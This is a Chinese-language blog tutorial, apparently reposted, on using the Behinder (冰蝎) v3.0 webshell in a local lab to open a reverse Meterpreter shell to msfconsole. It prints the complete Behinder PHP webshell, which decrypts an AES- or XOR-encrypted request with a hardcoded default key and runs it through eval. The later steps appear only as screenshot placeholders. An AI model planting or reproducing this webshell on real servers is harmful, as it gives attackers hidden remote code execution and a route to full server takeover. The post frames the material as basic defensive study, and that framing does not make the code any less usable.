前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >冰蝎下的反弹shell连接msfconsole

冰蝎下的反弹shell连接msfconsole

作者头像
全栈程序员站长
发布2022-10-04 16:06:16
8890
发布2022-10-04 16:06:16
举报

大家好,又见面了,我是你们的朋友全栈君。

文章目录

前言

好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。

一、使用木马getshell

冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。

在这里插入图片描述
在这里插入图片描述

这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就应该这样操作。因为手底下没有现成的webshell。我就去网上找了那些一句话木马,或者可以绕过waf的木马。尝试都无果。后来看了一篇关于冰蝎反弹shell的文章。文章中介绍的是本地环境问题,将PHP的版本改到7.0以上就可以执行了。尝试无果。经过尝试发现冰蝎的脚本得使用对应版本的shell。之前都是一套下载使用的没怎么注意,这次掉坑了。

1.搭建环境

  • 靶机:win 2008
  • 环境:phpstudy 2016
  • 冰蝎:v3.0
在这里插入图片描述
在这里插入图片描述

因为本地测试,文章以反弹shell为主,就直接将shell拖到服务器了。这里挂一下3.0中PHP的一句话代码。

代码语言:javascript
复制
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{ 

$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) { 

$post[$i] = $post[$i]^$key[$i+1&15]; 
}
}
else
{ 

$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{ 
public function __invoke($p) { 
eval($p."");}}
@call_user_func(new C(),$params);
?>

有兴趣的可以研究一下代码。

二、冰蝎配置

  1. 新建shell,点击保存
在这里插入图片描述
在这里插入图片描述
  1. 进入反弹shell配置界面
在这里插入图片描述
在这里插入图片描述
  1. 选择Meterpreter功能
在这里插入图片描述
在这里插入图片描述
  1. 根据冰蝎的温馨提示,使用kali进行监听就行了。

三、kali监听

我这里Mac上装了msfconsole就直接来演示了

  1. 启动msf
在这里插入图片描述
在这里插入图片描述
  1. 使用exp
在这里插入图片描述
在这里插入图片描述
  1. 设置payload
在这里插入图片描述
在这里插入图片描述
  1. 查看设置
在这里插入图片描述
在这里插入图片描述
  1. 配置本机地址和监听端口
在这里插入图片描述
在这里插入图片描述
  1. 开始监听
在这里插入图片描述
在这里插入图片描述
  1. 冰蝎发送数据建立连接
在这里插入图片描述
在这里插入图片描述
  1. 执行命令
在这里插入图片描述
在这里插入图片描述

总结

总的来说跟用msf生成exe木马,监听木马一样的流程。只不过这里的冰蝎代替了exe来执行。文中有几处不太坚定的答案。还希望好心的大佬给出确定的解答。初级工具使用,仅用于基础信息防御交流,请勿用于其他用途。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/196444.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月7日 上,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
  • 前言
  • 一、使用木马getshell
    • 1.搭建环境
    • 二、冰蝎配置
    • 三、kali监听
    • 总结
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档